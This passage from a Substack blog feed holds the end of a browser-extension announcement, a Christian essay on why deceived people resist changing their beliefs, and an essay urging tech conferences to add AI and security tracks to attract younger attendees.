<a href="https://github.com/rod-trent/Collections-Plus">https://github.com/rod-trent/Collections-Plus</a></strong></p><p>Migrating from Edge is one click: export your Collections data in Edge, then in Collections Plus use <strong>Import Edge CSV&#8230;</strong>.</p><blockquote><p>Running it on more than one computer? After any update, hit <strong>reload &#8635;</strong> on the extension card on <em>each</em> device, since unpacked extensions don&#8217;t auto-update.</p></blockquote><h2><strong>What&#8217;s next</strong></h2><p>If something here would make your day better, or you want a feature I haven&#8217;t built, tell me. I build the things people actually ask for.</p><p>Edge Collections is going away. Yours doesn&#8217;t have to.</p><p><em>Collections Plus is <a href="https://github.com/rod-trent/Collections-Plus">open source on GitHub</a>. Fork it, file issues, send ideas.</em></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption"></p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[Why It Is So Hard for the Deeply Duped to Change Course]]></title><description><![CDATA[&#8220;Lord, I believe. Help my unbelief&#8221; (Mark 9:24) and be set free by the truth (John 8:32).]]></description><link>https://rodtrent.substack.com/p/why-it-is-so-hard-for-the-deeply</link><guid isPermaLink="false">https://rodtrent.substack.com/p/why-it-is-so-hard-for-the-deeply</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Wed, 03 Jun 2026 14:01:08 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!tc_e!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc892082f-ee84-4bad-9a26-efc5a31acd97_1168x784.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!tc_e!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc892082f-ee84-4bad-9a26-efc5a31acd97_1168x784.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!tc_e!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc892082f-ee84-4bad-9a26-efc5a31acd97_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!tc_e!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc892082f-ee84-4bad-9a26-efc5a31acd97_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!tc_e!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc892082f-ee84-4bad-9a26-efc5a31acd97_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!tc_e!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc892082f-ee84-4bad-9a26-efc5a31acd97_1168x784.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!tc_e!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc892082f-ee84-4bad-9a26-efc5a31acd97_1168x784.jpeg" width="1168" height="784" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c892082f-ee84-4bad-9a26-efc5a31acd97_1168x784.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:784,&quot;width&quot;:1168,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:318850,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/195229857?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc892082f-ee84-4bad-9a26-efc5a31acd97_1168x784.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!tc_e!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc892082f-ee84-4bad-9a26-efc5a31acd97_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!tc_e!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc892082f-ee84-4bad-9a26-efc5a31acd97_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!tc_e!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc892082f-ee84-4bad-9a26-efc5a31acd97_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!tc_e!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc892082f-ee84-4bad-9a26-efc5a31acd97_1168x784.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>We have all seen it. Someone invests years, sometimes decades, into a belief system, a narrative, or a worldview that turns out to be built on shaky ground, cherry-picked data, or outright falsehoods. When evidence mounts against it, the response is not reflection. It is often doubling down, anger, or outright denial. Changing one&#8217;s mind after heavy emotional and social investment is not just uncomfortable. It is psychologically excruciating. Scripture shows us this is not merely a modern psychological issue. It is a deep spiritual reality rooted in the human heart.</p><h3>The Sunk Cost Fallacy and the Idol of Self</h3><p>Imagine pouring money, time, and identity into something: a career, relationships, public stands, or a worldview. Admitting the foundation was rotten feels like admitting your life up to that point was partly wasted. The Bible calls this the snare of pride and idolatry. When we tie our identity to a lie, we make an idol of our own understanding.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p>Proverbs 16:18 warns, &#8220;Pride goes before destruction, and a haughty spirit before a fall.&#8221; The Pharisees invested their entire lives in their traditions and status. When Jesus stood before them with miracles and truth, many could not repent because it would cost them everything they had built. Their sunk costs became golden calves they refused to tear down.</p><p>People do not simply update their thinking. They have built entire self-concepts around the narrative. Walking away risks social ostracism from the tribe that reinforced the belief. For many, the lie became their community, their moral compass, their source of superiority. Jesus said in John 5:44, &#8220;How can you believe, since you receive glory from one another and you do not seek the glory that is from the one and only God?&#8221;</p><h3>Cognitive Dissonance and the Hardened Heart</h3><p>Leon Festinger&#8217;s theory describes the mental tension when reality clashes with belief. The Bible explains it even more profoundly: the heart can become hardened. Pharaoh saw miracle after miracle, yet he hardened his heart (Exodus 8-11). Israel saw the Red Sea part and still grumbled in unbelief.</p><p>When duping is deep, repeated reinforcement from trusted voices hardens the heart. The mind resolves tension by dismissing truth. Scripture describes this in 2 Thessalonians 2:10-12: &#8220;They did not receive the love of the truth so as to be saved. For this reason God will send upon them a deluding influence so that they will believe what is false.&#8221;</p><p>Fear, moral outrage, or false hope becomes attached to the lie. Changing perspective requires not just new facts, but a renewed mind. Romans 12:2 commands, &#8220;Do not be conformed to this world, but be transformed by the renewing of your mind.&#8221; Facts alone rarely persuade because the heart loves darkness rather than light (John 3:19).</p><p>Social pressure amplifies this. Tribes punish defectors. The religious leaders of Jesus&#8217; day did the same. Yet Jesus warned in Matthew 10:37-38 that loving family, reputation, or tribe more than Him makes one unworthy of Him.</p><h3>Real-World Patterns Across Scripture</h3><p>This pattern appears throughout the Bible:</p><ul><li><p>The Israelites who preferred slavery in Egypt to the cost of freedom.</p></li><li><p>The rich young ruler who walked away sad because of his great possessions (Mark 10:22).</p></li><li><p>False teachers and their followers who &#8220;will not endure sound doctrine&#8221; but heap up teachers to suit their desires (2 Timothy 4:3-4).</p></li><li><p>Everyday idolatry: clinging to money, power, tradition, or political alliances despite clear biblical warnings.</p></li></ul><p>The harder the investment of heart and life, the stronger the resistance. Jesus noted this when He said it is easier for a camel to go through the eye of a needle than for a rich man to enter the kingdom (Matthew 19:24). The &#8220;rich&#8221; are not only those with money, but those rich in their own righteousness and worldview.</p><h3>The Narrow Path to Repentance</h3><p>True change is rare and difficult, but Scripture gives the path:</p><ol><li><p>Exposure to cracks: The Holy Spirit convicts and the Word pierces the heart (Hebrews 4:12). Not always one big moment, but accumulating truth that cannot be ignored.</p></li><li><p>Safe space for doubt: Honest wrestling with God, like the Psalms or Job. A place free from mocking where truth can be examined.</p></li><li><p>Identity reconstruction: &#8220;If anyone is in Christ, he is a new creation. The old has passed away; behold, the new has come&#8221; (2 Corinthians 5:17).</p></li><li><p>Humility practice: &#8220;God opposes the proud but gives grace to the humble&#8221; (James 4:6). Embracing &#8220;I was wrong&#8221; and turning to Christ.</p></li></ol><p>Most people never fully repent. Many soften edges of error without surrendering fully. True change often requires a crisis that breaks the heart. Like the prodigal son who &#8220;came to his senses&#8221; only after hitting rock bottom (Luke 15:17).</p><p>As observers and believers, our response must be compassion mixed with truth. &#8220;Speaking the truth in love&#8221; (Ephesians 4:15). Mockery hardens hearts further. Patient, prayerful proclamation of truth plants seeds. Not everyone will receive it, but some will. Jesus wept over Jerusalem even as He spoke hard truth.</p><h3>Final Thought</h3><p>Being duped does not make someone stupid. It reveals the universal condition of the fallen human heart. We have all believed lies and held views we will one day cringe at. The difficulty in changing is not merely psychological. It is spiritual: &#8220;The heart is deceitful above all things, and desperately sick&#8221; (Jeremiah 17:9).</p><p>The antidote is the fear of the Lord and love of truth. Hold every belief up to Scripture. Test it ruthlessly. Repent publicly when wrong. In a world that prizes certainty and punishes humility, genuine repentance remains rare and heroic. If more of us recognized how hard it is, perhaps fewer would fall so deeply into deception, and more would find the courage to cry out, &#8220;Lord, I believe. Help my unbelief&#8221; (Mark 9:24) and be set free by the truth (John 8:32).</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[Revitalizing Tech Conferences: Why Embracing AI and Security Is the Only Way to Attract the Next Generation]]></title><description><![CDATA[Because &#8220;Legacy Systems&#8221; Shouldn&#8217;t Describe Your Attendee List]]></description><link>https://rodtrent.substack.com/p/revitalizing-tech-conferences-why</link><guid isPermaLink="false">https://rodtrent.substack.com/p/revitalizing-tech-conferences-why</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Wed, 03 Jun 2026 12:03:34 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!vrIv!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2ffc9aa4-f5d1-47dc-8ca0-73eb31bd1025_1168x784.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!vrIv!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2ffc9aa4-f5d1-47dc-8ca0-73eb31bd1025_1168x784.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!vrIv!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2ffc9aa4-f5d1-47dc-8ca0-73eb31bd1025_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!vrIv!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2ffc9aa4-f5d1-47dc-8ca0-73eb31bd1025_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!vrIv!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2ffc9aa4-f5d1-47dc-8ca0-73eb31bd1025_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!vrIv!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2ffc9aa4-f5d1-47dc-8ca0-73eb31bd1025_1168x784.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!vrIv!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2ffc9aa4-f5d1-47dc-8ca0-73eb31bd1025_1168x784.jpeg" width="1168" height="784" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2ffc9aa4-f5d1-47dc-8ca0-73eb31bd1025_1168x784.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:784,&quot;width&quot;:1168,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:289340,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/197575477?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2ffc9aa4-f5d1-47dc-8ca0-73eb31bd1025_1168x784.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!vrIv!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2ffc9aa4-f5d1-47dc-8ca0-73eb31bd1025_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!vrIv!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2ffc9aa4-f5d1-47dc-8ca0-73eb31bd1025_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!vrIv!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2ffc9aa4-f5d1-47dc-8ca0-73eb31bd1025_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!vrIv!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2ffc9aa4-f5d1-47dc-8ca0-73eb31bd1025_1168x784.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Tech conferences are in trouble. Walk the halls of many long-running industry events today, and you will notice the same thing: graying hair, familiar faces, and a palpable sense of deja vu. The average attendee age has been creeping upward for years. Pre-pandemic, it hovered around 53 across corporate, association, and for-profit events. Even as it has dropped to 41-42 in recent years, the organizer demographic has not budged. First-time attendee return rates sit at a dismal 30 percent. Registrations are flat or declining for many events. The message is clear: traditional conferences are aging out.</p><p>The root cause is not mysterious. For decades, many professionals have stuck with the same tooling, the same processes, and the same mental models they learned early in their careers. They attend conferences for networking, vendor swag, and incremental updates on familiar topics, until retirement. Meanwhile, the world has moved on. Younger professionals, Millennials and especially Gen Z, are building careers in a landscape defined by artificial intelligence, pervasive digital threats, and rapid disruption. They are not showing up because the content does not speak to their reality. They want skills that matter now and tomorrow.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p>The solution is straightforward and urgent: conferences must aggressively expand their topic portfolios to center <strong>Security</strong> and <strong>AI</strong>. These are not niche add-ons. They are the hottest, most resonant subjects for the next generation of talent. By making them core through dedicated tracks, hands-on workshops, integrated sessions, and fresh speaker pipelines, organizers can reverse the demographic slide, inject energy into stale lineups, and future-proof their events.</p><h3>The Demographic Cliff Facing Conferences</h3><p>Conferences have long relied on a loyal base of mid-to-late-career professionals who value continuity over reinvention. But that base is retiring. Younger attendees (under 40 now make up a growing share, with 18 percent under 25 in some datasets) attend multiple events per year when the value is obvious. They drive change precisely because they expect relevance. When events fail to deliver modern, applicable content, younger professionals vote with their feet and their wallets.</p><p>This is not just about numbers; it is about survival. Flat registrations and low retention threaten the events industry. Organizers who cling to what worked in 2015 risk becoming irrelevant relics. The antidote is audience refresh: deliberately attracting early-career technologists, developers, security analysts, data scientists, and AI practitioners who bring fresh energy, diverse perspectives, and long-term loyalty.</p><h3>Why Security and AI Resonate So Deeply with Youth</h3><p>Security and AI are not buzzwords to Gen Z and Millennials. They are existential. Here is why they land with such force:</p><p><strong>Cybersecurity is a jobs magnet with massive unmet demand.</strong> The global shortage stands at roughly 4.8 million unfilled positions (up 19 percent year-over-year). In the U.S. alone, information security analysts are projected to grow 29-33 percent from 2024 to 2034, seven times faster than the average for all occupations. That translates to tens of thousands of new openings annually. Young professionals see clear pathways to high-impact, well-compensated roles that directly address real-world chaos: ransomware, supply-chain attacks, AI-powered threats, and state-sponsored espionage.</p><p><strong>AI is transforming everything, and young people are already living it.</strong> 57 percent of Gen Z and 56 percent of Millennials use generative AI in their daily work. They grew up with ChatGPT, Copilot, and agentic systems as everyday tools. They want to understand prompt engineering, ethical deployment, model governance, and the business value of AI, not as abstract theory, but as competitive advantage. At the same time, they are acutely aware of AI&#8217;s risks: job displacement (some surveys show Gen Z anticipating 20 percent of entry-level roles automated), bias, and new attack surfaces.</p><p><strong>The intersection is pure rocket fuel.</strong> AI-driven cyberattacks are now among the top threats organizations face. Young talent wants to explore secure-by-design AI, adversarial machine learning, AI for threat detection, and responsible AI governance. Conferences that ignore this intersection miss the single biggest growth area in tech.</p><p>These topics also feel urgent and actionable. Unlike incremental updates to legacy systems, AI and security sessions deliver immediately applicable skills: building a RAG pipeline, running a red-team exercise, implementing zero-trust architecture, or evaluating LLM risks. Young attendees leave energized, not exhausted by vendor pitches.</p><h3>The Business Case for Conference Organizers</h3><p>Expanding into AI and Security is not charity. It is smart strategy. It:</p><ul><li><p>Attracts volume and diversity. Events like Black Hat and RSA Conference have thrived by leaning hard into AI-powered security, drawing record crowds and younger demographics through hands-on villages, CTFs, and specialized summits.</p></li><li><p>Boosts cross-generational value. Veteran attendees learn modern threat models and AI tooling from younger speakers. Younger attendees gain institutional wisdom from seasoned practitioners.</p></li><li><p>Increases sponsorship and revenue. Vendors in AI platforms, cloud security, and cybersecurity tools are desperate for qualified leads. Dedicated tracks create natural sponsorship opportunities.</p></li><li><p>Enhances reputation. Conferences that evolve are seen as forward-thinking. Those that do not risk being labeled boomer fests.</p></li><li><p>Creates stickiness. Hands-on labs, hackathons, and certification prep turn one-time visitors into repeat customers.</p></li></ul><h3>How to Actually Do It: A Practical Playbook</h3><p>Expanding topics requires more than slapping AI on a session title. Here is a step-by-step guide that has worked for conferences that successfully refreshed their audiences:</p><ol><li><p><strong>Audit and Reframe Existing Content</strong> Do not abandon your core audience. Instead, audit every track and ask: How does this intersect with AI or Security? Turn a DevOps talk into Secure CI/CD Pipelines in the Age of AI Agents. Rebrand database sessions as AI-Ready Data Platforms with Built-In Governance. This eases the transition while signaling relevance.</p></li><li><p><strong>Launch Dedicated Tracks and Villages</strong> Create full-day or multi-day experiences:</p><ul><li><p>AI Engineering and Governance</p></li><li><p>Cybersecurity Operations and Threat Intelligence</p></li><li><p>Secure AI Development and Adversarial ML</p></li><li><p>Ethical AI, Bias, and Regulatory Compliance Mirror successful models from Black Hat&#8217;s AI Summit or RSA&#8217;s innovation sandbox. Include beginner, intermediate, and advanced levels so everyone finds value.</p></li></ul></li><li><p><strong>Prioritize Hands-On, Interactive Formats</strong> Youth crave participation over passive keynotes. Offer:</p><ul><li><p>Capture-the-Flag (CTF) competitions with AI challenges</p></li><li><p>Prompt engineering workshops</p></li><li><p>Red-team/blue-team simulations</p></li><li><p>LLM fine-tuning labs</p></li><li><p>Tabletop exercises on AI-driven incident response These sessions fill up fast and generate social proof (photos, LinkedIn posts, GitHub repos).</p></li></ul></li><li><p><strong>Build a Fresh Speaker Pipeline</strong></p><ul><li><p>Issue targeted calls for papers focused on AI/Security.</p></li><li><p>Partner with universities, bootcamps (e.g., General Assembly, Springboard), and young professional groups (Women in Cybersecurity, AI4All).</p></li><li><p>Invite Gen Z/Millennial practitioners from startups, Big Tech security teams, and open-source projects.</p></li><li><p>Use diversity scholarships to lower barriers for early-career and underrepresented speakers.</p></li></ul></li><li><p><strong>Market Aggressively to Younger Audiences</strong></p><ul><li><p>Run targeted campaigns on LinkedIn, TikTok, Instagram, and Discord communities.</p></li><li><p>Offer student/early-career discounted or scholarship tickets.</p></li><li><p>Partner with campus tech clubs and career services.</p></li><li><p>Highlight ROI: Gain skills that land jobs and Network with hiring managers from top AI and security firms.</p></li><li><p>Leverage hybrid/virtual options. Many young professionals juggle jobs, side hustles, or student loans and cannot always travel.</p></li></ul></li><li><p><strong>Foster Integration and Collaboration</strong> Encourage cross-track sessions: How AI Is Changing Cloud Security or Securing GenAI Applications in Regulated Industries. Host mixed-generation panels where veterans discuss legacy system risks alongside young experts demonstrating AI defenses.</p></li><li><p><strong>Measure and Iterate</strong> Track attendee demographics, session attendance, Net Promoter Scores, and post-event skill application surveys. Use AI-powered analytics (ironically) to see what resonates. Adjust year-over-year based on data.</p></li></ol><h3>Real-World Proof It Works</h3><p>Look at conferences that have leaned in: Black Hat USA now features dedicated AI security content and draws massive crowds of both veterans and rising talent. RSA Conference has made AI-driven threats and defenses central themes. NVIDIA GTC and similar AI-heavy events sell out because they deliver cutting-edge, practical value. Even enterprise events like AWS re:Invent and Google Cloud Next have exploded session counts on AI and security, keeping attendance strong across generations.</p><h3>Addressing the Pushback</h3><p>Some organizers worry about alienating loyal (older) attendees. Others fear they lack the expertise to curate quality AI/Security content. Both concerns are manageable. Start small. Pilot one track. Survey your audience; most veterans want to learn about these topics so they stay relevant. Partner with established organizations (ISACA, OWASP, AI Alliance) for credibility. Quality control comes from rigorous review processes and clear guidelines for submissions.</p><p>Resistance often melts once the energy shifts. The buzz from sold-out workshops and younger faces in the hallways becomes contagious.</p><h3>The Future Belongs to Conferences That Evolve</h3><p>The tech landscape is not waiting for conferences to catch up. AI and security are no longer emerging. They are foundational. Conferences that treat them as core pillars will thrive: higher attendance, better demographics, stronger sponsorships, and genuine community impact.</p><p>If your event is feeling stale, now is the moment. Expand the topics. Invite the next generation. Give them skills they can use on Monday morning. The payoff is not just a younger crowd. It is a vibrant, future-ready conference that remains relevant for decades to come.</p><p>Organizers: your move. The youth are not coming unless you build what they need. Build it, and they will show up, ready to learn, network, and carry the industry forward.</p><p><em>What is one AI or Security topic you would love to see at your favorite conference? Drop it in the comments. I would love to hear your thoughts.</em></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[Security Check-in Quick Hits: Palo Alto VPN Bypass, WordPress Takeovers, Dashlane Attacks & npm Supply Chain Hits]]></title><description><![CDATA[For June 2, 2026]]></description><link>https://rodtrent.substack.com/p/security-check-in-quick-hits-palo-d83</link><guid isPermaLink="false">https://rodtrent.substack.com/p/security-check-in-quick-hits-palo-d83</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Tue, 02 Jun 2026 18:00:37 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!FTvl!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F699506b6-d8c3-4f67-89c6-1abf25fe9b4f_1168x784.jpeg" length="0" 